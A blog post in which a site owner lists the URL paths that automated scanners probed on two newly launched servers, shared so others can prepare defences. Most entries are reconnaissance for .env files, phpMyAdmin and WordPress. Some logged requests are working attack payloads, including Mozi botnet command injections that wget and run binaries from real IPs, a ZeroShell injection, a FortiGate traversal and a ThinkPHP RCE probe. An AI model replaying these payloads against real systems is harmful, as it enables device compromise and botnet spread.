My server is scanned with these paths

Sang

18 min read
My server is scanned with these paths

After releasing a website just within 2 weeks, my server is scanned with these URLs. I publish it here for my later reference and also hope that it helps others for a good beforehand protection.

From a first server (hosted in AWS).

/07-accessing-data/begin/vue-heroes/.env
/07-accessing-data/end/vue-heroes/.env
/08-routing/begin/vue-heroes/.env
/08-routing/end/vue-heroes/.env
/09-managing-state/begin/vue-heroes/.env
/09-managing-state/end/vue-heroes/.env
/0bef
/2018/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml
/2phpmyadmin/index.php?lang=en
/31_structure_tests/.env
/3-sequelize/final/.env
/acme-challenge/.env
/acme_challenges/.env
/acme/.env
/actions-server/.env
/actuator/health
/admin-app/.env
/admin/config.php
/admin/db/index.php?lang=en
/admin/.env
/adminer/.env
/admin/index.php?lang=en
/administrator/admin/index.php?lang=en
/administrator/db/index.php?lang=en
/administrator/.env
/administrator/phpmyadmin/index.php?lang=en
/administrator/phpMyAdmin/index.php?lang=en
/administrator/pma/index.php?lang=en
/administrator/PMA/index.php?lang=en
/administrator/web/index.php?lang=en
/admin/phpmyadmin/index.php?lang=en
/admin/phpMyAdmin/index.php?lang=en
/admin/pMA/index.php?lang=en
/admin/sqladmin/index.php?lang=en
/admin/sysadmin/index.php?lang=en
/admin/webadmin.php?mod=do&act=login
/admin/web/index.php?lang=en
/agora/.env
/ajax?act=getrlist&rid=1
/ajax?act=online&rst=12
/alpha/.env
/anaconda/.env
/anquan/qgga.asp
/api2/1/orderBook/btc_usdt
/api/ApiHub/fetchJinse
/api/config-init
/api/content_bottom
/api/.env
/api/Index/getLottery
/api/index/grailindex
/api/jsonws/invoke
/api/message/webInfo
/api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1
/api/src/.env
/api/user/get_user_group
/api/v1/borrowxx.html
/api/v1/member/kefu
/api/v1/time
/api/v/index/queryOfficePage?officeCode=customHomeLink
/api/web/user/getIndexData.php
/app1-static/.env
/app2-static/.env
/app/client/.env
/app/code/community/Nosto/Tagging/.env
/app/config/dev/.env
/app/config/.env
/app_dir/.env
/app/.env
/app/frontend/.env
/app_nginx_static_path/.env
/app-order-client/.env
/apps/client/.env
/apps/.env
/Archipel/.env
/asset_img/.env
/assets/dist/static/js/vendor_prod.js
/assets/.env
/assets/extension/market/css/mt4.css
/Assignment3/.env
/Assignment4/.env
/audio/.env
/Autodiscover/Autodiscover.xml
/awstats/.env
/babel-plugin-dotenv/test/fixtures/as-alias/.env
/babel-plugin-dotenv/test/fixtures/default/.env
/babel-plugin-dotenv/test/fixtures/dev-env/.env
/babel-plugin-dotenv/test/fixtures/empty-values/.env
/babel-plugin-dotenv/test/fixtures/filename/.env
/babel-plugin-dotenv/test/fixtures/override-value/.env
/babel-plugin-dotenv/test/fixtures/prod-env/.env
/back-end/app/.env
/backend/.env
/backendfinaltest/.env
/backend/src/.env
/back/.env
/bag2
/banner.do?code=1
/base_dir/.env
/base/exchange_index/changepwdfirst
/base/exchange_index/googlecode
/bgoldd/.env
/blankon/.env
/blog/.env
/blog/wp-includes/wlwmanifest.xml
/blog/wp-login.php
/blue/.env
/boaform/admin/formLogin?username=ec8&psd=ec8
/bootstrap/.env
/boxes/oracle-vagrant-boxes/Kubernetes/.env
/boxes/oracle-vagrant-boxes/OLCNE/.env
/build/.env
/.c9/metadata/environment/.env
/cdw-backend/.env
/cgi-bin/.env
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Awget+http%3A%2F%2F87.121.98.34%2Fzzz%2Fx86.deathh+-O+%2Ftmp%2Fdata671%0A+chmod+777+%2Ftmp%2Fdata671%0A+%2Ftmp%2Fdata671+zeroshell.x86%0A%27
/ch6a-mytodo/.env
/ch6-mytodo/.env
/ch7a-mytodo/.env
/ch8a-mytodo/.env
/ch8b-mytodo/.env
/Chai/.env
/challenge/.env
/chat-client/.env
/check.php
/chiminey/.env
/clientaccesspolicy.xml
/ClientApp/.env
/client/.env
/client/src/.env
/cmd/testdata/expected/dot_env/.env
/cms/wp-includes/wlwmanifest.xml
/code/api/.env
/codenames-frontend/.env
/code/web/.env
/collab-connect-web-application/server/.env
/common/download.js
/common/member/js/user.util.js
/common/template/lottery/lecai/css/style.css
/community/.env
/conf/.env
/config
/config/getuser?index=0
/config.js
/config.php?_=3283&1922563758
/console/
/ContainerRegistry/.env
/Content/common/web/CommonActivity.css
/Content/css/wzwstylel.css
/content/.env
/core/app/.env
/core/Datavase/.env
/core/persistence/.env
/counterblockd/.env
/counterwallet/.env
/cron/.env
/cryo_project/.env
/css/all.css
/css/dafa.css
/css/.env
/Css/Hm.css
/css/info.css
/css/skin/ymPrompt.css
/css/style.css
/css/view/main/goin.css
/css/view/main/style.css
/custom/.env
/database/.env
/database/index.php?lang=en
/data/.env
/dataset1/.env
/dbadmin/index.php?lang=en
/db/db-admin/index.php?lang=en
/db/dbadmin/index.php?lang=en
/db/dbweb/index.php?lang=en
/db/index.php?lang=en
/db/myadmin/index.php?lang=en
/db/phpmyadmin3/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/db/phpMyAdmin3/index.php?lang=en
/db/phpmyadmin/index.php?lang=en
/db/phpMyAdmin/index.php?lang=en
/db/webadmin/index.php?lang=en
/db/webdb/index.php?lang=en
/db/websql/index.php?lang=en
/default/.env
/.docker/.env
/.docker/laravel/app/.env
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/elrekt.php
/.env
/.env~
/.env.backup
/.env.dev
/.env.development.local
/.env.docker.dev
/.env.example
/.env.local
/.env.php
/.env.prod
/.env.production.local
/.env.sample.php
/.env.save
/.env.stage
/.env.test
/.env.test.local
/fePublicInfo/
/ff/css/cssy.css
/files/pub_reset.css
/getConfig/getArticle.do?code=1
/getConfig/getArticle.do?code=19
/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097
/getConfig/listPopFrame.do?code=1&position=index&_=1601489645097
/.gitlab-ci/.env
/GponForm/diag_Form?images/
/GponForm/diag_Form?style/
/h5/
/Home/Bind/binding
/home/loadmymanager
/homes/
/html/public/index.php
/hudson
/_ignition/execute-solution
/images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi
/images/src_images_but_dianz_s.png
/im/in/GetUuid
/index/login/register
/index/Mobile/fenshi?code=sz002405
/index/Mobile/kline_week?code=sz003043
/index.php
/index.php/Index/register.html
/index.php/sign
/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
/index.php/Wap/Api/getBanner
/infe/rest/fig/advertise/common.json?mobile_open=1
/info.php
/jenkins/login
/jiaoyimao/default.css
/js/chat/chat.js
/js/common.js
/js/config20181225.js
/js/dianzan.js
/js/json.js
/JS/loginstatus.js
/kefu.php
/langConfig.js
/lanren/css/global.css
/legal/currency/set
/loan
/locale/Goex/zh/common.js
/login/img/nyyh/chkjs.js
/login/img/nyyh/game.css
//login_sid.lua
/m/allticker/1
/manager/html
/manager/text/list
/m.api
/market/market-ws/iframe.html
/media/wp-includes/wlwmanifest.xml
/mh/phone.do
/mifs/.;/services/LogService
/mobile/config.js
/mobile/script/main.m.js
/mobile/v3/appSuperDownload.do
/m/ticker/usdtqc
/myadmin/index.php?lang=en
/MyAdmin/index.php?lang=en
/mysql/admin/index.php?lang=en
/mysqladmin/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/db/index.php?lang=en
/mysql/index.php?lang=en
/mysqlmanager/index.php?lang=en
/mysql/mysqlmanager/index.php?lang=en
/mysql/pma/index.php?lang=en
/mysql/pMA/index.php?lang=en
/mysql/sqlmanager/index.php?lang=en
/mysql/web/index.php?lang=en
/news/wp-includes/wlwmanifest.xml
/n/news/banner?column_id=303
/nyyh/chkjs.js
/nyyh/game.css
/otc/
/other/codepay/js/codepay_util.js
/owa/
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/pages/console/js/common.js
/Pc/Lang/index.html
/phpmyadmin/
/phpmyadmin1/index.php?lang=en
/phpMyAdmin1/index.php?lang=en
/phpmyadmin2011/index.php?lang=en
/phpmyadmin2012/index.php?lang=en
/phpmyadmin2013/index.php?lang=en
/phpmyadmin2014/index.php?lang=en
/phpmyadmin2015/index.php?lang=en
/phpmyadmin2016/index.php?lang=en
/phpmyadmin2017/index.php?lang=en
/phpmyadmin2018/index.php?lang=en
/phpmyadmin2019/index.php?lang=en
/phpmyadmin2020/index.php?lang=en
/phpmyadmin2021/index.php?lang=en
/phpmyadmin2/index.php?lang=en
/phpMyAdmin2/index.php?lang=en
/phpmyadmin3/index.php?lang=en
/phpMyAdmin-3/index.php?lang=en
/phpMyAdmin3/index.php?lang=en
/phpmyadmin4/index.php?lang=en
/phpMyAdmin4/index.php?lang=en
/phpmyadmin5/index.php?lang=en
/phpMyAdmin5/index.php?lang=en
/_phpmyadmin/index.php?lang=en
/php-my-admin/index.php?lang=en
/php-myadmin/index.php?lang=en
/phpmy-admin/index.php?lang=en
/phpmyadmin/index.php?lang=en
/phpmyadmin_/index.php?lang=en
/phpmyAdmin/index.php?lang=en
/phpMyadmin/index.php?lang=en
/_phpMyAdmin/index.php?lang=en
/phpMyAdmin/index.php?lang=en
/phpMyAdmin_/index.php?lang=en
/phpmy/index.php?lang=en
/phppma/index.php?lang=en
/pma2011/index.php?lang=en
/PMA2011/index.php?lang=en
/pma2012/index.php?lang=en
/PMA2012/index.php?lang=en
/pma2013/index.php?lang=en
/PMA2013/index.php?lang=en
/pma2014/index.php?lang=en
/PMA2014/index.php?lang=en
/pma2015/index.php?lang=en
/PMA2015/index.php?lang=en
/pma2016/index.php?lang=en
/PMA2016/index.php?lang=en
/pma2017/index.php?lang=en
/PMA2017/index.php?lang=en
/PMA2018/index.php?lang=en
/pma2019/index.php?lang=en
/PMA2019/index.php?lang=en
/pma2020/index.php?lang=en
/PMA2020/index.php?lang=en
/pma2021/index.php?lang=en
/PMA2021/index.php?lang=en
/pma/index.php?lang=en
/PMA/index.php?lang=en
/program/index.php?lang=en
/public/admin.php/api/index/loansList
/Public/css/errorCss.css
/Public/css/_pk10.css
/public/css/style.css
/public/h5static/js/main.js
/Public/home/common/js/index.js
/Public/home/js/check.js
/Public/home/js/fukuang.js
/public/index.php
/Public/initJs.php
/Public/js/common.js
/public/js/global.js
/Public/Wchat/css/index.css
/Public/Wchat/js/cvphp.js
/public/web/css/add//index.css
/recordings/theme/main.css
/register.asp
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/Res/font/font.css
/resources/main/common.js
/room/getRoomBangFans
/s_api/basic/config_js?callback=__set_config
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.213.44.124:48897/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://163.125.2.0:48954/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.34.165:53675/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.51.89:55830/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.175.62.124:58579/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.213:33640/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
/shell?cd+/tmp;rm+-rf+*;wget+http://180.150.94.40:57353/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/shopdb/index.php?lang=en
/shop/wp-includes/wlwmanifest.xml
/site/get-hq?proNo=btc&panType=1&pid=1
/site/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/skin/js/common.js
/solr/admin/info/system?wt=json
/sqlmanager/index.php?lang=en
/sql/myadmin/index.php?lang=en
/sql/phpmanager/index.php?lang=en
/sql/phpmyadmin2/index.php?lang=en
/sql/phpMyAdmin2/index.php?lang=en
/sql/php-myadmin/index.php?lang=en
/sql/phpmy-admin/index.php?lang=en
/sql/phpMyAdmin/index.php?lang=en
/sql/sql-admin/index.php?lang=en
/sql/sqladmin/index.php?lang=en
/sql/sql/index.php?lang=en
/sql/sqlweb/index.php?lang=en
/sql/webadmin/index.php?lang=en
/sql/webdb/index.php?lang=en
/sql/websql/index.php?lang=en
/static/common/js/common.js
/static/common/js/global.js
/static/data/configjs.js
/static/data/thirdgames.json
/static/diff_worker.js
/static/download/style.css
/_static/.env
/static/guide/ab.css
/static/home/css2/login--1.css
/static/index/css/iindex.css
/static/index/js/lk/order.js
/statics/js/API.js
/static/wap/css/index.css
/static/xianyu/js/bankCheck.js
/step1.asp
/t3
/template/920ka/js/woodyapp.js
/template/css/login.css
/template/js/comm/Confrim.js
/Templates/user/js/global.js
/template/tmp1/js/common.js
/__tests__/test-become/.env
/test/wp-includes/wlwmanifest.xml
/thinkphp/html/public/index.php
/TP/html/public/index.php
/TP/index.php
/TP/public/index.php
/tutorial_asset_bundle/v0/Android/60/608951a207465476c128f1aaa739346935905dd291da63d09b6917eb67996291
/user/login
/v1/management/tenant/getSpeedDomain
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/views/commData/commonSite.js
/.vscode/.env
/wap/api/exchangerateuserconfig!get.action
/wap/trading/get_newallorder_ajax
/web/api/getBanner
/webdav/
/website/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/wordpress/wp-login.php
/wp1/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/wp-content/plugins/wp-file-manager/readme.txt
/wp-includes/wlwmanifest.xml
/wp-login.php
/wp/wp-includes/wlwmanifest.xml
/wp/wp-login.php
/xmlrpc.php?rsd
/xy/

From the second server. It looks like the scanner is Vietnamese because there is a Vietnamese word in the path list.

/2018/
/2019/
//2019/wp-includes/wlwmanifest.xml
/2020/
/2020/08/
/2020/08/chao-moi-nguoi/
//2020/wp-includes/wlwmanifest.xml
/ab
/abc
/about
/admin
/administrator
/api/.env
/api/house
/api/log
/api/search?folderIds=0
/api/status
/archivarix.cms.php
/author/astropro/feed/
/backup/
/bak/
/bk/
/blog
/blog/
//blog/wp-includes/wlwmanifest.xml
/blog/wp-login.php
/category/khong-phan-loai/
/cms/
//cms/wp-includes/wlwmanifest.xml
/comments/feed/
/config.json
/demo/
/demo/downloader/index.php
/demo/errors/503.php
/demo/index.php/admin/
/demo/rss/catalog/notifystock
/demo/rss/catalog/review
/demo/rss/order/new
/dev/
/dev/downloader/index.php
/dev/errors/503.php
/dev/index.php/admin/
/dev/rss/catalog/notifystock
/dev/rss/catalog/review
/dev/rss/order/new
/downloader/index.php
/.env
/errors/503.php
/?fbclid=IwAR0qZ_AbWz1y3So4N7CdrxdpjFx9qZSq72-IxEMYB78HSFBMAwOPPI2wd-k
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/gh
/.git/config
/.git/HEAD
/hi
/home/
/home/favicon.ico
/idx_config/
/img
/index.php/admin/
/info.php
/install/
/magento/downloader/index.php
/magento/errors/503.php
/magento/index.php/admin/
/magento/rss/catalog/notifystock
/magento/rss/catalog/review
/magento/rss/order/new
/main/
/new/
/new-site/
//news/wp-includes/wlwmanifest.xml
/old/
/old/downloader/index.php
/old/errors/503.php
/old/index.php/admin/
/old/rss/catalog/notifystock
/old/rss/catalog/review
/old/rss/order/new
/old-site/
/old-wp/
/privacy-policy
/rss/catalog/notifystock
/rss/catalog/review
/rss/order/new
/server-status
/services
/shop/downloader/index.php
/shop/errors/503.php
/shop/index.php/admin/
/shop/rss/catalog/notifystock
/shop/rss/catalog/review
/shop/rss/order/new
//shop/wp-includes/wlwmanifest.xml
/site/
//site/wp-includes/wlwmanifest.xml
//sito/wp-includes/wlwmanifest.xml
/staging/downloader/index.php
/staging/errors/503.php
/staging/index.php/admin/
/staging/rss/catalog/notifystock
/staging/rss/catalog/review
/staging/rss/order/new
/store/downloader/index.php
/store/errors/503.php
/store/index.php/admin/
/store/rss/catalog/notifystock
/store/rss/catalog/review
/store/rss/order/new
/telescope/requests
/temp/
/test/
/test/downloader/index.php
/test/errors/503.php
/test/index.php/admin/
/test/rss/catalog/notifystock
/test/rss/catalog/review
/test/rss/order/new
//test/wp-includes/wlwmanifest.xml
/tmp/
/v1/
/v2/
/v2/_catalog
/vendor/phpunit/phpunit/LICENSE
//vendor/phpunit/phpunit/phpunit.xsd
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/Vuln.php
/web/
//website/wp-includes/wlwmanifest.xml
//web/wp-includes/wlwmanifest.xml
/wordpress/
//wordpress/wp-includes/wlwmanifest.xml
/wordpress/wp-login.php
/wp/
/wp1/
//wp1/wp-includes/wlwmanifest.xml
/wp2/
//wp2/wp-includes/wlwmanifest.xml
/wp-admin
/wp-admin/admin-ajax.php?action=_ning_upload_image
/wp-admin/upgrade.php
/wp-content/
/wp-content/plugins/wpdiscuz/readme.txt
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
//wp-includes/wlwmanifest.xml
/wp-login.php
//wp/wp-includes/wlwmanifest.xml
/wp/wp-login.php
/ws_utc/config.do
/ww.js.map
/xmlrpc.php
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1615576483&nonce=pwdaEDlkII&body-hash=pdst%2B%2B8gjpsEsdzTGdS19%2BYN3g4%3D&signature=B%2FO48NHRurJsMuUeLyz6sHGf7gs%3D
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1615576484&nonce=TUgogrfPMd&body-hash=METbiCw%2BtMQdctk0fdLMNlXOKKM%3D&signature=Q1fELVLKRpJdHUFx4YA7zjny0ak%3D
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1616098321&nonce=MIlVlmW7XJ&body-hash=pdst%2B%2B8gjpsEsdzTGdS19%2BYN3g4%3D&signature=MHYt%2BJGZ1DBeAC3S6y6MyTcoR%2FM%3D
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1616098322&nonce=PMDhZj87qa&body-hash=METbiCw%2BtMQdctk0fdLMNlXOKKM%3D&signature=hxQ9uTa7YZKP23ithNT4EoeQzJ0%3D
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1617612201&nonce=ju47zi3zKZ&body-hash=pdst%2B%2B8gjpsEsdzTGdS19%2BYN3g4%3D&signature=UBbqy9BA%2B7s%2B2ib2kOuPWgtN1Sc%3D
/xmlrpc.php?for=jetpack&token=rLiINRrzvx%26T%23u%23GD%29%5EDxK6%25wi%21c%5Ek%28T%3A1%3A1&timestamp=1617612202&nonce=raGEzr33KS&body-hash=METbiCw%2BtMQdctk0fdLMNlXOKKM%3D&signature=A8wljh61QgaOqnRyPt1IUj0uPNM%3D
//xmlrpc.php?rsd
/xyz
/xyz?

The list by combing the two above list, with query string removed, and only shortest prefixes left (i.e., if /a/b/c and /a/b are in the list, /a/b/c is removed).

/07-accessing-data/begin/vue-heroes/.env
/07-accessing-data/end/vue-heroes/.env
/08-routing/begin/vue-heroes/.env
/08-routing/end/vue-heroes/.env
/09-managing-state/begin/vue-heroes/.env
/09-managing-state/end/vue-heroes/.env
/0bef
/2018/
/2019/
//2019/wp-includes/wlwmanifest.xml
/2020/
//2020/wp-includes/wlwmanifest.xml
/2phpmyadmin/index.php
/31_structure_tests/.env
/3-sequelize/final/.env
/ab
/acme-challenge/.env
/acme_challenges/.env
/acme/.env
/actions-server/.env
/actuator/health
/agora/.env
/ajax
/alpha/.env
/anaconda/.env
/anquan/qgga.asp
/api2/1/orderBook/btc_usdt
/api/ApiHub/fetchJinse
/api/config-init
/api/content_bottom
/api/.env
/api/house
/api/Index/getLottery
/api/index/grailindex
/api/jsonws/invoke
/api/message/webInfo
/api/product/topRank
/api/src/.env
/api/user/get_user_group
/api/v1/borrowxx.html
/api/v1/member/kefu
/api/v1/time
/api/v/index/queryOfficePage
/api/web/user/getIndexData.php
/app1-static/.env
/app2-static/.env
/app/client/.env
/app/code/community/Nosto/Tagging/.env
/app/config/dev/.env
/app/config/.env
/app_dir/.env
/app/.env
/app/frontend/.env
/app_nginx_static_path/.env
/app-order-client/.env
/apps/client/.env
/apps/.env
/Archipel/.env
/archivarix.cms.php
/asset_img/.env
/assets/dist/static/js/vendor_prod.js
/assets/.env
/assets/extension/market/css/mt4.css
/Assignment3/.env
/Assignment4/.env
/audio/.env
/author/astropro/feed/
/Autodiscover/Autodiscover.xml
/awstats/.env
/babel-plugin-dotenv/test/fixtures/as-alias/.env
/babel-plugin-dotenv/test/fixtures/default/.env
/babel-plugin-dotenv/test/fixtures/dev-env/.env
/babel-plugin-dotenv/test/fixtures/empty-values/.env
/babel-plugin-dotenv/test/fixtures/filename/.env
/babel-plugin-dotenv/test/fixtures/override-value/.env
/babel-plugin-dotenv/test/fixtures/prod-env/.env
/back-end/app/.env
/backend/.env
/backendfinaltest/.env
/backend/src/.env
/back/.env
/backup/
/bag2
/bak/
/banner.do
/base_dir/.env
/base/exchange_index/changepwdfirst
/base/exchange_index/googlecode
/bgoldd/.env
/bk/
/blankon/.env
/blog
//blog/wp-includes/wlwmanifest.xml
/blue/.env
/boaform/admin/formLogin
/bootstrap/.env
/boxes/oracle-vagrant-boxes/Kubernetes/.env
/boxes/oracle-vagrant-boxes/OLCNE/.env
/build/.env
/.c9/metadata/environment/.env
/category/khong-phan-loai/
/cdw-backend/.env
/cgi-bin/.env
/cgi-bin/kerbynet
/ch6a-mytodo/.env
/ch6-mytodo/.env
/ch7a-mytodo/.env
/ch8a-mytodo/.env
/ch8b-mytodo/.env
/Chai/.env
/challenge/.env
/chat-client/.env
/check.php
/chiminey/.env
/clientaccesspolicy.xml
/ClientApp/.env
/client/.env
/client/src/.env
/cmd/testdata/expected/dot_env/.env
/cms/
//cms/wp-includes/wlwmanifest.xml
/code/api/.env
/codenames-frontend/.env
/code/web/.env
/collab-connect-web-application/server/.env
/comments/feed/
/common/download.js
/common/member/js/user.util.js
/common/template/lottery/lecai/css/style.css
/community/.env
/conf/.env
/config
/console/
/ContainerRegistry/.env
/Content/common/web/CommonActivity.css
/Content/css/wzwstylel.css
/content/.env
/core/app/.env
/core/Datavase/.env
/core/persistence/.env
/counterblockd/.env
/counterwallet/.env
/cron/.env
/cryo_project/.env
/css/all.css
/css/dafa.css
/css/.env
/Css/Hm.css
/css/info.css
/css/skin/ymPrompt.css
/css/style.css
/css/view/main/goin.css
/css/view/main/style.css
/custom/.env
/database/.env
/database/index.php
/data/.env
/dataset1/.env
/dbadmin/index.php
/db/db-admin/index.php
/db/dbadmin/index.php
/db/dbweb/index.php
/db/index.php
/db/myadmin/index.php
/db/phpmyadmin3/index.php
/db/phpMyAdmin-3/index.php
/db/phpMyAdmin3/index.php
/db/phpmyadmin/index.php
/db/phpMyAdmin/index.php
/db/webadmin/index.php
/db/webdb/index.php
/db/websql/index.php
/default/.env
/demo/
/dev/
/.docker/.env
/.docker/laravel/app/.env
/downloader/index.php
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/elrekt.php
/.env
/errors/503.php
/fePublicInfo/
/ff/css/cssy.css
/files/pub_reset.css
/fw.login.php
/getConfig/getArticle.do
/getConfig/listPopFrame.do
/gh
/.git/config
/.git/HEAD
/.gitlab-ci/.env
/GponForm/diag_Form
/h5/
/hi
/home/
/Home/Bind/binding
/homes/
/html/public/index.php
/hudson
/idx_config/
/_ignition/execute-solution
/images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi
/images/src_images_but_dianz_s.png
/img
/im/in/GetUuid
/index/login/register
/index/Mobile/fenshi
/index/Mobile/kline_week
/index.php
/infe/rest/fig/advertise/common.json
/info.php
/install/
/jenkins/login
/jiaoyimao/default.css
/js/chat/chat.js
/js/common.js
/js/config20181225.js
/js/dianzan.js
/js/json.js
/JS/loginstatus.js
/kefu.php
/langConfig.js
/lanren/css/global.css
/legal/currency/set
/loan
/locale/Goex/zh/common.js
/login/img/nyyh/chkjs.js
/login/img/nyyh/game.css
//login_sid.lua
/magento/downloader/index.php
/magento/errors/503.php
/magento/index.php/admin/
/magento/rss/catalog/notifystock
/magento/rss/catalog/review
/magento/rss/order/new
/main/
/m/allticker/1
/manager/html
/manager/text/list
/m.api
/market/market-ws/iframe.html
/media/wp-includes/wlwmanifest.xml
/mh/phone.do
/mifs/.;/services/LogService
/mobile/config.js
/mobile/script/main.m.js
/mobile/v3/appSuperDownload.do
/m/ticker/usdtqc
/myadmin/index.php
/MyAdmin/index.php
/mysql/admin/index.php
/mysqladmin/index.php
/mysql/dbadmin/index.php
/mysql/db/index.php
/mysql/index.php
/mysqlmanager/index.php
/mysql/mysqlmanager/index.php
/mysql/pma/index.php
/mysql/pMA/index.php
/mysql/sqlmanager/index.php
/mysql/web/index.php
/new/
/new-site/
//news/wp-includes/wlwmanifest.xml
/news/wp-includes/wlwmanifest.xml
/n/news/banner
/nyyh/chkjs.js
/nyyh/game.css
/old/
/old-site/
/old-wp/
/otc/
/other/codepay/js/codepay_util.js
/owa/
/pages/console/js/common.js
/Pc/Lang/index.html
/phpmyadmin/
/phpmyadmin1/index.php
/phpMyAdmin1/index.php
/phpmyadmin2011/index.php
/phpmyadmin2012/index.php
/phpmyadmin2013/index.php
/phpmyadmin2014/index.php
/phpmyadmin2015/index.php
/phpmyadmin2016/index.php
/phpmyadmin2017/index.php
/phpmyadmin2018/index.php
/phpmyadmin2019/index.php
/phpmyadmin2020/index.php
/phpmyadmin2021/index.php
/phpmyadmin2/index.php
/phpMyAdmin2/index.php
/phpmyadmin3/index.php
/phpMyAdmin-3/index.php
/phpMyAdmin3/index.php
/phpmyadmin4/index.php
/phpMyAdmin4/index.php
/phpmyadmin5/index.php
/phpMyAdmin5/index.php
/_phpmyadmin/index.php
/php-my-admin/index.php
/php-myadmin/index.php
/phpmy-admin/index.php
/phpmyadmin_/index.php
/phpmyAdmin/index.php
/phpMyadmin/index.php
/_phpMyAdmin/index.php
/phpMyAdmin/index.php
/phpMyAdmin_/index.ph
/phpmy/index.php
/phppma/index.php
/pma2011/index.php
/PMA2011/index.php
/pma2012/index.php
/PMA2012/index.php
/pma2013/index.php
/PMA2013/index.php
/pma2014/index.php
/PMA2014/index.php
/pma2015/index.php
/PMA2015/index.php
/pma2016/index.php
/PMA2016/index.php
/pma2017/index.php
/PMA2017/index.php
/PMA2018/index.php
/pma2019/index.php
/PMA2019/index.php
/pma2020/index.php
/PMA2020/index.php
/pma2021/index.php
/PMA2021/index.php
/pma/index.php
/PMA/index.php
/privacy-policy
/program/index.php
/public/admin.php/api/index/loansList
/Public/css/errorCss.css
/Public/css/_pk10.css
/public/css/style.css
/public/h5static/js/main.js
/Public/home/common/js/index.js
/Public/home/js/check.js
/Public/home/js/fukuang.js
/public/index.php
/Public/initJs.php
/Public/js/common.js
/public/js/global.js
/Public/Wchat/css/index.css
/Public/Wchat/js/cvphp.js
/public/web/css/add//index.css
/recordings/theme/main.css
/register.asp
/remote/fgt_lang
/Res/font/font.css
/resources/main/common.js
/room/getRoomBangFans
/rss/catalog/notifystock
/rss/catalog/review
/rss/order/new
/s_api/basic/config_js
/server-status
/services
/setup.cgi
/shell
/shopdb/index.php
/shop/downloader/index.php
/shop/errors/503.php
/shop/index.php/admin/
/shop/rss/catalog/notifystock
/shop/rss/catalog/review
/shop/rss/order/new
//shop/wp-includes/wlwmanifest.xml
/shop/wp-includes/wlwmanifest.xml
/site/
//site/wp-includes/wlwmanifest.xml
//sito/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/skin/js/common.js
/solr/admin/info/system
/sqlmanager/index.php
/sql/myadmin/index.php
/sql/phpmanager/index.php
/sql/phpmyadmin2/index.php
/sql/phpMyAdmin2/index.php
/sql/php-myadmin/index.php
/sql/phpmy-admin/index.php
